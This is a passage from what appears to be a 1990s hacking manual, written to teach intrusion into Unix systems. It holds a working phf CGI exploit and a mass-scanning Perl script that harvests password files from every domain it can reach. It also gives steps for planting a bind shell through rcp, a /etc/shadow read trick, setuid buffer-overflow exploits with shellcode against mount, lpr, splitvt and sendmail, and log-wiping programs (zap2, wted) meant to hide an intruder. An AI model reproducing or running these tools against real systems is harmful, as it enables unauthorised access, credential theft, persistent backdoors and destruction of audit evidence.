he->h_length);
} else {
fprintf(stderr, "%s: unknown host %s\n", argv[0], hostname);
exit(1);
}
}
sin.sin_family = AF_INET;
sin.sin_port = htons((u_short) port);
if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: could not get socket\n", argv[0]);
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
close(s);
fprintf(stderr, "%s: could not establish connection\n", argv[0]);
exit(1);
}
sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s\n", command);
free(command);
write(s, exploit, strlen(exploit));
while(bytes == 128) {
bytes = read(s, buffer, 128);
fprintf(stdout, buffer);
}
close(s);
}
-------- cut here
Here is how you use it:
bash% phf id xxx.org
------
<H1>Query Results</H1>
<P>
/usr/local/bin/ph -m alias=X
id
<PRE>
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
</GET /cgi-bin/phf/?Qalias=X%0aid
------
The above was our response, remember to use the %codes after your command.
To cat the password file using this program you would type:
phf cat%20/etc/passwd hostname.xxx
Yet Another way to use phf was written by Quantumg on his web page, this is
new and just thought of, so I was sure to add this right into this manual
for you.
Here is the text:
New QG Phf Attack MO
--------------------
yerp.. I know it's a long time since phf has been considered a viable
attack but you'd be surprised just how many stupid linux operators there
are out there..
first.. a little background.
Phf is a cgi-bin executable found on apache web servers. It is sploitable
and the result is you can execute commands on the web server as whoever
they're running httpd as, usually nobody but sometimes as root. To sploit
it is simply a matter of connecting to the web server and giving the
query:
GET /cgi-bin/phf/?Qalias=X%0a
followed by the command you wish to execute with %20 used for spaces. You
can do no piping, quotes, shell replacements, etc.
ok.. so on with the attack. What we are going to do is go and look for a
linux box (I usually telnet to the box to see the issue.net) which has the
phf bug. I, like a whole lot of other people, use the program phf
loxsmith to exploit the phf bug. All it does is connect to the host
specified in argv[2] and dump the query with argv[1] as the command. It
is used as such:
phf id www.host.to.hack
where id is the command you want to execute. This is the first thing I'd
do. Not only does it tell me if the box is sploitable, it also tells me
what they are running httpd as. So, assuming we get back a nice response,
we have a box to hack. The first problem is getting stuff onto the box to
execute. It's not much of a problem. You can 1 check for writable ftp
directory's or 2, and my personal favorite, use rcp. To use rcp you need
to set up a few things on your machine (or better yet, a machine that you
hacked earlier). The first of these things is an account that you can use
for the transfer. Select something simple and unmemoriable. I use the
username "test". Next you need to put the name of the host you are
hacking (www.host.to.hack) in your /etc/hosts.equiv. Then you need to
make sure you have a "shell" line in your /etc/inetd.conf and that you
have restarted inetd to read this line. Finally you need to create a
.rhosts file in the test's homedir that has the name of the host you're
hacking followed by the username that httpd is running as.
/etc/hosts.equiv:
www.host.to.hack
/etc/inetd.conf:
shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
~test/.rhosts:
www.host.to.hack nobody
ok.. so once you have all that set up you can get things onto the remote
host.
What I used to do was transfer little hacks across that had been heavily
modified to work whilst being executed by phf. It was not a pleasant
affair, nor very effective. Now we have a solution. What we send across
is a modified in.telnetd. It has been modified to start up in "debug"
mode which makes it bind to a port (9999) and execute /bin/sh instead of
/bin/login. It also forks before executing the shell which means it will
sit on port 9999 and accept as many connections as you want.
So, to get this onto the remote host, all we have to do is put it in
test's homedir (make sure it's readable) and do:
phf 'rcp test@my.ip.address:bindwarez /tmp' www.host.to.hack
in your local logs you will see a connection attempt to in.rshd and the
command it executes (something like 'rcp -f bindwarez').. after the phf
finishes bindwarez will be in the /tmp on the remote machine. You can now
execute it and telnet to port 9999.
If the web site was stupid enough to be running httpd as root you will now
want to secure it by installing an in.telnetd trojan and cleaning up the
logs. However, more likely, you will only have a nobody shell and have to
hack root with some other sploit. I usually find this no problem because
the admin has taken it as granted that no-one will ever have a shell on
their www box and thus there's no need to secure it - which they're
obviously not very good at if they still have sploitable phf.
I cant stress the importance of cleaning out the logs tho. Your address,
the one in the rcp command you sent, is right there for the admin to see.
They dont even have to dig. These logs are usually in
/usr/local/etc/httpd/logs and sometimes in /var/lib/httpd/logs. The best
way to find it is to try these locations and then, if you still don't find
it, do: find / -name cgi-bin. That'll do it. Also don't forget to kill
the bindwarez processes and remove the /tmp/bindwarez.
This is a really kewl attack.. it solves a lot of problems which makes phf
so annoying.
L8s
QuantumG
Another way to use phf would be to use the perl script a few scripts above
called getdomain.pl to rip host names out of the domain files on
rs.internic.net, after this is done you can 'probe' every domain on the net
using geturl.pl.
Here is the script:
geturl.pl
--------- cut here
#!/usr/bin/perl -w
#
# geturl by Nfin8 / Invisible Evil
# Questions to: /msg i-e or /msg i^e
#
# Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/usr/bin/id
# Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
# IF result of first command returns an "id=" then check for user. If user
# is not root then execute the 2nd form.
# Assign null list to @URLs which will be added to later.
my(@URLs)=();
my($program) = "lynx -dump";
# Pull off filename from commandline. If it isn't defined, then assign default.
my($URLfilename) = shift;
$URLfilename = "urls" if !defined($URLfilename);
# Do checking on input.
die("GetURL: $URLfilename is a directory.\n") if (-d $URLfilename);
# Open and read contents of URL file into @URL by line.
open(FILE, $URLfilename) or die("GetURL: Cannot open $URLfilename for input.\n");
@URLs = <FILE>;
close(FILE);
# Open output file.
open(OUTFILE, ">>GetURLResults") or die("GetURL: Cannot open output file.\n");
my($url)="";
foreach $url (@URLs) {
print ("Now checking: $url");
chomp($url);
$result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/usr/bin/id`;
print OUTFILE ("\n============ $url ============\n");
foreach (split(/\n/, $result)) {
print OUTFILE ("$_\n");
}
if ($result =~ m/id=/i) {
if ($result =~ m/root/i) {
print ("Logging root response.\n");
} else {
print ("Got ID response, getting /etc/passwd...");
$result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd`;
# Output results to file named <domain>.passwd;
local($domainfilename)="";
$domainfilename = $url;
if (open(PASSWDFILE, ">${domainfilename}.passwd")) {
print PASSWDFILE ("\n");
foreach (split(/\n/, $result)) {
print PASSWDFILE ("$_\n");
}
close(PASSWDFILE);
print ("Done! [$domainfilename].\n");
} else {
print ("FAILED! [$domainfilename].\n");
}
}
}
}
# We are done. Close the output file and end the program.
close (OUTFILE);
0;
------------- cut here
Ok this is easy, if you name your domain file urls, you are all set to go.
Just type geturl.pl after chmod +x on the file.
Here are my doc's for the file:
This handy tool is easy to use and will get you some root access and
many passwd files from different domains.
geturl.pl will try and log results for every domain on the internet. You
choose the type: .COM .EDU .ORG .MIL .GOV (OR) you can supply a list of
IP addresses to be checked. If finds a root access account it
will simply log uid=root in the result file and go on to the next domain.
If PHF Probe finds non-root access it will snag the passwd file for you and
save it in the current directory in the (domainname.???.passwd) format.
Here are the short doc's and how it works. Any questions /msg i-e or i^e
ftp to ftp.rs.internic.net
in the domain directory you will find:
com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
download these files and run getdomain.pl on the domains you want to target
first, in this manor: "perl getdomain.pl com.zone com >com.all"
What this will do is rip all of the .COM domains and put them into a file
called com.all.
If you wanted to do all of the .EDU addresses you would type:
perl getdomain.pl edu.zone edu >edu.all
Now you will have a list to use with (geturl.pl) called edu.all
To use this list just type:
geturl.pl <filename>
filename=edu.all or com.all and leave out the <>'s
if you name your domain file 'urls' it does not require <filename>
results will log into a file name of: GetURLResults in the current directory.
1. geturl.pl will search using lynx (make sure it is in your path)
2. if geturl finds it has root access to httpd on a url it will just log
root for that domain in the result file. If geturl finds it is not root,
but still has access to the domain using phf it will snatch the domain
passwd file and save it in the current directory under fulldomainname.passwd
3. if you like you can just give a list of ip addresses in the feed file
4. i use os/2 with lynx and perl ported to the hpfs so i have no problems
with the long file names. i have tested it under unix and it works good
so you should have no problems running this in a unix shell.
What you need:
1. Perl in the path
2. Lynx in the path
3. 256 char filenames ie: (unix or os/2 hpfs)
4. The files included here
5. Internic's domain files from their ftp or just make your own list or
urls or IP's and name the file 'urls' and type: geturl.pl
Caution:
It would be best if you paid cash for an internet account in your area under
another name or used a hacked account to get all of your results, then used
another safe account to start your work on the results. BUT I don't need to
tell you this right? I take no blame for these files, they are provided for
you to use to check security on domains ;)
getdomain.pl: to rip .ORG .COM .EDU .MIL .GOV Internic domain files
geturl.pl: to check and log the results of each domain
GetURLResults: The file that geturl makes as its log file
Here is one more thought:
If you can read the /var/adm/messages file you can get some user passwords
out of there lotz of times! I have even got ROOT passwords from there!
Wow many times have you been in a hurry to login? You type the password
at the Login: his is easy to do on one of those days that nothing seems to
be going right. You failed the login twice, the system is running slow, and it
just happens!
Login: you hit enter
Password: you think this is wanting the login name so you type your name
Login: you type your password
In the messages file it looks like this:
Login: yourpassword
Password ****** They don't give it, only the login name, but ooops, you
typed your password, and if we have access to read the messages file,
we have a good password to put in crackerjack and run it. If on a small
system, no prob ... lets hope it's root ;)
Here is a script to make things easy!
FOR QUANTUM'S BINDWAREZ FILE: You will find it at the end of this paper
in the appendix uuencoded.
------------ cut here
#!/bin/sh
# Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
# <daveg@escape.com>
# http://www.escape.com/~daveg
echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$
grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$
if [ ! -e ./scrack ]
then
echo "Creating scrack.c"
cat << ! > scrack.c
#include <stdio.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#define get_salt( d, s ) strncpy( d, s, 2 )
void
main(argc,argv)
int argc;
char **argv;
{
struct passwd *pwd;
FILE *fp;
char buff[80], salt[3], *encrypted_string;
if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
{
fprintf( stderr, "Couldnt find dict file\n" );
exit(1);
}
while ( fgets( buff, 80, fp ) != NULL )
{
setpwent();
buff[strlen(buff)-1]='\0';
while ( ( pwd = getpwent() ) != NULL )
{
if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
( strlen( (*pwd).pw_passwd ) == 13 ) )
{
get_salt(salt, (*pwd).pw_passwd );
encrypted_string = crypt( buff, salt );
if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
{
fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
fflush(stdout);
}
}
}
}
}
!
echo "Creating scrack"
cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
fi
./scrack /tmp/messages.dict.$$
echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.
------ cut here
-----------------------
Section 3B
Newbe's
-----------------------
Yup, again, just another place to get password files. Just follow the guide
lines in section 2B. Use your sly ideas and get out there and make some
lame friends ;)
Remember you could have been a lammer before you read this manual <G>rin
-----------------------------
Section 3C
Getting shadow passwd files
-----------------------------
What is a shadow password file?
Lets just use the passwd file above to show you what it would look like to you
if you cat it.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
man:x:13:15:man:/usr/man:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:x:-2:100:nobody:/dev/null:
ftp:x:404:1::/home/ftp:/bin/bash
guest:x:405:100:guest:/dev/null:/dev/null
bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:x:502:100:Web Master:/home/web:/bin/bash
mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash
Something missing? Yup, the encrypted passwords. If you get root access the
encrypted passwords are in /etc/shadow. Some admin's will hide the shadow file
in some weird directory somewhere, but most of the time you will find it right
in /etc. Other shadow programs might put it in a master.passwd file. But if
you get root just have a good look around.
Lets say you have an account on the machine and just can't get root access.
Not a problem if they are using libc 5.4.7, at this time most still are ;)
Also one of these files have to have suid perm's (no prob):
ping, traceroute, rlogin, or, ssh
1. Type bash or sh to start a bash shell
2. Type: export RESOLV_HOST_CONF=/etc/shadow
3. Type one of the file names above with asdf, like this:
ping asdf
It should cat the passwd shadow file for you if it works.
I seem to find it working on most of the systems i am going on these days.
Note: you can replace /etc/shadow with any root owned file you want to read.
Here is a quick script you can run on any file you want to make it easy:
rcb.c
-------- cut here
/* RCB Phraser - therapy in '96
* Limits: Linux only, no binary files.
* little personal message to the world: FUCK CENSORSHIP!
*/
#include <stdio.h>
void getjunk(const char *filetocat)
{ setenv("RESOLV_HOST_CONF",filetocat,1);
system("ping xy 1> /dev/null 2> phrasing");
unsetenv("RESOLV_HOST_CONF");
}
void main(argc,argv)
int argc; char **argv;
{ char buffer[200];
char *gag;
FILE *devel;
if((argc==1) || !(strcmp(argv[1],"-h")) || !(strcmp(argv[1],"--help")))
{ printf("RCB Phraser - junked by THERAPY\n\n");
printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0]);
exit(1);
}
getjunk(argv[1]);
gag=buffer;
gag+=10;
devel=fopen("phrasing","rb");
while(!feof(devel))
{ fgets(buffer,sizeof(buffer),devel);
if(strlen(buffer)>24)
{ strcpy(buffer+strlen(buffer)-24,"\n");
fputs(gag,stdout);
}
}
fclose(devel);
remove("phrasing");
}
-------------- cut here
command line : rcb /etc/shadow or any other file on the system you
can't read ;)
--------------------
Section 3D
Getting /etc/hosts
--------------------
Just a precaution, sometimes you will need to know what other systems
are in the hosts file, or what are all of the ip addresses or different domains
on the system. Make sure to cat the /etc/hosts file for more information
you might need later.
--------------------------
Chapter IV
Getting the root account
--------------------------
Like I said before all you need is one account in most cases, if you cannot get
root on the system you might want to trade it off to some irc junkie that
just wants to load a bot, for some other account or info that can help you in
your hacking quest. There will be enough information here so that if you can't
get root access, their system is well kept and probably will be kept up in the
future. You can always lay the account on the side, put the info in some kind
of log file with some good notes so that you can come back at a later time,
like right when a new exploit comes out ;)
Try to stay out of the system until that time so that you do not risk loosing
the account. Remember that when you login to an account and can't get root
you will not be able to clean the logs, and the next time the user logs in he
might see a message that says: last login from xxx.com time:0:00 date:xx/xx/xx
------------
Section 4A
Bugs
------------
There are many bugs out there in different programs that you can use to get
root. It might be a game installed on the system, or even the sendmail
program. If they do not update their programs on a regular basis, you can
be sure you will be able to get in now, and if not, soon to come.
I will be sure to provide the main exploits and bugs here and other less
used below in the appendix section. I will make sure here to give you detailed
english terms so that you can exploit root on the system. But please be sure
to read the sections below, and this manual entirely before proceeding, to be
sure you get started in the right way and not blow you chances of having a
long stay on the system.
------------
Section 4B
Exploits
------------
umount/mount exploit
Look in the /bin directory for a file called umount (or mount),
if you do not find it there do a search for the file like this:
find / -name umount -print -xdev
(you can look for any other file name the same way)
Go to the directory where the file is and do: ls -al um*
If the file has suid perm's you can probably get root.
SUID perm's has the rws for the owner of the file which is root. What you are
looking for is the (s)
Look here:
victim:/bin# ls -al um*
-rwsr-sr-x 1 root 8888 Mar 21 1995 umount
victim:/bin#
This machine we can get root by a compile on the file below:
umount.c
------ cut here
/* sno.c : Linux realpath exploit
* Syntax: ./sno N
* mount $WOOT
* OR umount $WOOT
* N is some number which seems to differ between 4 & 8, if your number is
* too big, you will get a mount error, if it is too small, it will seg
* fault. Figure it out. (Sometimes N=0 for mount)
* If you use mount, first thing to do once you get the root shell is rm
* /etc/mtab~, if this file exists you can't root with mount until it is
* removed.
*
*
* -ReDragon
*/
#define SIZE 1024
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main(int argc, char **argv)
{
char env[SIZE+4+1]; /* 1024 buffer + 4 byte return address + null byte */
int a,r;
char *ptr;
long *addr_ptr;
char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *exec_ptr = execshell;
r=atoi(argv[1]);
ptr = env;
memcpy(ptr,"WOOT=",5); /* set environment variable to use */
ptr += 5;
for(a=0;a<SIZE+4-strlen(execshell)-r;a++) /* pad front with NOPs */
*(ptr++) = 0x90;
while (*exec_ptr)
*(ptr++) = *(exec_ptr++);
addr_ptr = (long *)ptr;
*(addr_ptr++) = get_esp()+1139; /* 0xbffffc01 */
ptr = (char *) addr_ptr;
*ptr = 0; /* must end with null byte to terminate string */
putenv(env);
system("/bin/mount $WOOT");
}
----------- cut here
**********************************
To compile the file on the victims machine type gcc umount.c (or what ever
name you called it) -o um
This will make a file called um that you can exec. Sometimes you will need
to put a ./ in front of the file like this: ./um
With this exploit you might also have to give it a number like:
./um 0 (or) ./um 4 ....alltheway up to 8... like this again ./um 8
*************************************
If you fail here you might want to try lpr. Look in the /usr/bin for lpr and
see if it is SUID, if it is lpr should work if it is up on the system.
ls -l lpr
Ok it had suid perm's? Use this script
*************************************
lpr.linux.c
------------- cut here
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
---------- cut here
***************************
Here is the BSD version
***************************
lpr.bsd.c
--------------------------------------------------------- cut here
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------- cut here
Now just compile it and chmod it +x, and run it.
Watch this one on the group file owner. Any file you copy will have
group owner as lp, make sure you chgrp root filename on any file you
write. Always be watching the user groups with ls -l and if you changed
any change them back like this:
chgrp groupname filename
It is a good idea to use this exploit ONLY to get the root access, then
just copy bash or sh to another file name on the system somewhere and make
it root root, suid: Group owner and File owner root, then chmod it +s
This will give you root access in the future as gid and uid root, without using
the lp group. Make sure you name it something that looks like it should be
running as a root process somewhere ;)
*****************
Here is another that is still around after a while, look for SUID perm's
on a file /usr/bin/splitvt
If it has suid perm's use this file below, but be sure to read the directions
after the exploit:
****************************************
sp.c
-------------------------------------------- cut here
/*
* Avalon Security Research
* Release 1.3
* (splitvt)
*
* Affected Program: splitvt(1)
*
* Affected Operating Systems: Linux 2-3.X
*
* Exploitation Result: Local users can obtain superuser privileges.
*
* Bug Synopsis: A stack overflow exists via user defined unbounds checked
* user supplied data sent to a sprintf().
*
* Syntax:
* crimson~$ cc -o sp sp.c
* crimson~$ sp
* bash$ sp
* bash$ splitvt
* bash# whoami
* root
*
* Credit: Full credit for this bug (both the research and the code)
* goes to Dave G. & Vic M. Any questions should be directed to
* mcpheea@cadvision.com .
*
* ----------------------------------------------------------------------------
*/
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
-------------- cut here
Ok this is how splitvt works:
1. Compile the file
2. Run the sp file
3. Run splitvt
Before you run the file: whoami {press enter}
username
After you run the exploit: whoami
root
*******************************************************
Now if all of these have not got you root, try sm.sh. This is a sendmail
bug that works with 8.73 to 8.83 (maybe some others)
Here is the script:
sm.sh
---------- cut here
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
cd /tmp
sh
------------ cut here
Just chmod the file +x like this
chmod +x sm.sh
1. Run the file
2. It will take you to the /tmp directory
3. type ls -l and see if you have a SUID sh file there, if you do, type
whoami, if not root, run the file ./sh, now see if you are root ;)
I will add many more scripts in the appendix, but these should be the best
at this time to get root access on linux or BSD, if you need another BSD
exploit try the crontab exploit for BSD in the appendix.
****************************************************************************
--------------------------
Chapter V
Making yourself invisible
--------------------------
The whole point of this hacking stuff is that you continue to have access to as
many points of information as possible. If you do stupid things, of fail just
once to clean your utmp or wtmp, xferlog's, etc ... you can loose access to the
system. Make yourself a regular order to follow and learn each system well!
Become part of the system, and take many notes if you are doing many systems
at once. But remember make yourself a routine. Have your set routine of
taking your time to clean any presence of your login, transfers, etc. Do NOT fail
in this one thing or you will loose access and possibly face some sort of
charges.
----------------------------
Section 5A
Zap2 (for wtmp/lastlog/utmp)
----------------------------
There are different log cleaning programs out there, but the best of these
is zap2. I compile mine to be named z2.
z2 will be run right after you get root access. This will want to be one of
the fastest things you run. (you never know)
You might want to do a finger @host.xxx to see who is on now, look at the idle
time of root or admin accounts to see if they are away doing something.
Login, and as soon as you get on, type w, to see idle time and who is on, but
at the same time you are looking at that be typing your root access command
that you should have waiting somewhere nested in the system. As soon as you
get your root access, type ./z2 username-u-logged-in-as
Now you are safer then you were. Do a w or who command to see that you are
gone from the utmp. If you ftp, or do other things you might have to use
other programs I will include in the next section called wted and lled.
Lets finish with this z2 first. You will have to see where each file is in
the system and edit z2.c to include the right location of these files
Here is the area you will look for right at the top of the file:
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
Most of the systems I login to are:
#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/var/adm/utmp"
#define LASTLOG_NAME "/var/adm/lastlog"
But you do your own look around to see were the files are. Also /var/log:
is a regular location.
Add the log locations for each system, compile the file, and you are all ready
to be invisible right after the login using z2
Here is the .c file
z2.c
--------------------------- cut here
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
--------------------------- cut here
---------------
Section 5B
Other scripts
---------------
Now we come to the other part of this. Lets say that after you login, and do
your z2, you need to ftp in to grab a file. (remember NEVER ftp or telnet out)
Ok, you ftp in and grab a few files, or login to another account on the system,
now you will need to use wted. wted will let you edit the wtmp to remove your
login from the ftp. You also might need to use the lled (lastlog edit).
Here is the menu if you type ./wted, after setting log locations & compile:
[8:25pm][/home/compile]wted
Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
-h This help
-f Use FILE instead of default
-a Show all entries found
-u Show all entries for USER
-b Show NULL entries
-e Erase USER completely
-c Erase all connections containing HOST
-z Show ZAP'd entries
-x Attempt to remove ZAP'd entries completely
So if i ftp to username tsmith I would type wted -x -e tsmith
The program will now prompt you one login at a time for the user tsmith asking
if you want to delete it. After you delete your login, make sure to
chmod 644 the wtmp.tmp file and then copy it over the top of the wtmp file in
the log directory. Like this:
1. chmod 644 wtmp.tmp
2. cp wtmp.tmp /var/adm/wtmp
Here is your wted program:
MAKE SURE TO HAVE THE RIGHT PATH TO THE char file below
So make sure you have the right path to the wtmp file.
wted.c
---------------------- cut here
#include <stdio.h>
#include <utmp.h>
#include <time.h>
#include <fcntl.h>
char *file="/var/adm/wtmp";
main(argc,argv)
int argc;
char *argv[];
{
int i;
if (argc==1) usage();
for(i=1;i<argc;i++)
{
if(argv[i][0] == '-')
{
switch(argv[i][1])
{
case 'b': printents(""); break;
case 'z': printents("Z4p"); break;
case 'e': erase(argv[i+1],0); break;
case 'c': erase(0,argv[i+1]); break;
case 'f': file=argv[i+1]; break;
case 'u': printents(argv[i+1]); break;
case 'a': printents("*"); break;
case 'x': remnull(argv[i+1]); break;
default:usage();
}
}
}
}
printents(name)
char *name;
{
struct utmp utmp,*ptr;
int fp=-1;
ptr=&utmp;
if (fp=open(file,O_RDONLY))
{
while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp))
{
if ( !(strcmp(name,ptr->ut_name)) || (name=="*") ||
(!(strcmp("Z4p",name)) && (ptr->ut_time==0)))
printinfo(ptr);
}
close(fp);
}
}
printinfo(ptr)
struct utmp *ptr;
{
char tmpstr[256];
printf("%s\t",ptr->ut_name);
printf("%s\t",ptr->ut_line);
strcpy(tmpstr,ctime(&(ptr->ut_time)));
tmpstr[strlen(tmpstr)-1]='\0';
printf("%s\t",tmpstr);
printf("%s\n",ptr->ut_host);
}
erase(name,host)
char *name,*host;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct utmp utmp;
unsigned char c;
if (fp=open(file,O_RDONLY)) {
fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
